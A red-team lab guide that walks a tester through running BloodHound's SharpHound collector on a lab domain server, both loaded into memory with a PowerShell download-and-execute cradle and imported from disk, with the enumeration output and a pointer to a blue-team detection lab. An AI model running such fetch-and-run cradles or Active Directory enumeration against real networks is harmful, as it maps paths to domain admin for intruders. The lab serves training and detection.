L1120-Red BloodHound and SharpHound

Lab Contents

Lab Overview

The BloodHound tools are based in part on the Active Directory Control Paths project. The toolkit enumerates a wide array of information available from Active Directory. Coupled with the Neo4j interface, this is an incredible tool with varied implications for both blue and red teams. From a red team perspective, the BloodHound toolkit can assist a tester with visually mapping the fastest paths to a domain admin or other specific high-interest target. Blue teams can use this tool to keep an eye on paths, privileged sessions, account usage, group membership, and more.

Lab Overview

Lab Overview

Import and execute Bloodhound, an enumeration script that will gather information about Active Directory. Search for the execution of the script in the Optics Infrastructure.

Attack Step One

Invoke BloodHound from Memory

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Execute BloodHound From Internet

The next group of commands will download a PowerShell Script from the internet and load it directly into memory and allow it to be executed.

PowerShell Input

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound

PowerShell Output

PS C:\Users\itadmin> IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
PS C:\Users\itadmin> Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 6:45 AM on 6/28/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 277 objects finished (+277 277)/s -- Using 113 MB RAM
Enumeration finished in 00:00:01.1059298
Compressing data to C:\Users\itadmin\20200628064526_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 6:45 AM on 6/28/2020! Happy Graphing!

With the SharpHound tool completed, move on to the next step of this lab.

Attack Step Two

Execute BloodHound From Disk

Download, extract, and execute the BloodHoundAD data collector via powershell

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Bloodhound From Disk

From the PowerShell console, we allow TLS1.2, download the BloodHound release archive from GitHub, expand the archive, import the PowerShell module, and lastly Invoke-Bloodhound.

PowerShell Input

$ProgressPreference = 'SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest –URI https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip" 
Expand-Archive master.zip
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound

PowerShell Output

-----------------------------------------------
Initializing SharpHound at 7:01 AM on 6/28/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File Found! Loaded 521 Objects in cache
PS C:\Users\itadmin>
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 103 MB RAM
Status: 277 objects finished (+277 ∞)/s -- Using 110 MB RAM
Enumeration finished in 00:00:00.5343055
Compressing data to C:\Users\itadmin\20200628070125_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:01 AM on 6/28/2020! Happy Graphing!

Having completed Invoking the BloodHound ingestors with two different methods, lets look at hunting for these activities.

Continue on to L1120-Blue

Lab Complete